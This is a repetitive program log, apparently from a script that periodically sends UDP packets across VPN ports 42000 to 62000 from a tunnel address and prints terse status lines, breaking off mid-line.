-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:55:05 -Starting port fill at 2020-09-06 06:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:56:06 -Starting port fill at 2020-09-06 06:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:57:07 -Starting port fill at 2020-09-06 06:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:58:05 -Starting port fill at 2020-09-06 06:59:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:59:05 -Starting port fill at 2020-09-06 07:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:00:04 -Starting port fill at 2020-09-06 07:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:01:05 -Starting port fill at 2020-09-06 07:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:02:05 -Starting port fill at 2020-09-06 07:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:03:04 -Starting port fill at 2020-09-06 07:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:04:04 -Starting port fill at 2020-09-06 07:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:05:05 -Starting port fill at 2020-09-06 07:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:06:04 -Starting port fill at 2020-09-06 07:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:07:04 -Starting port fill at 2020-09-06 07:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:08:06 -Starting port fill at 2020-09-06 07:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:09:05 -Starting port fill at 2020-09-06 07:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:10:06 -Starting port fill at 2020-09-06 07:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:11:05 -Starting port fill at 2020-09-06 07:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:12:05 -Starting port fill at 2020-09-06 07:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:13:05 -Starting port fill at 2020-09-06 07:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:14:05 -Starting port fill at 2020-09-06 07:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:15:05 -Starting port fill at 2020-09-06 07:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 07:16:05 -Starting port fill at 2020-09-06 07:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 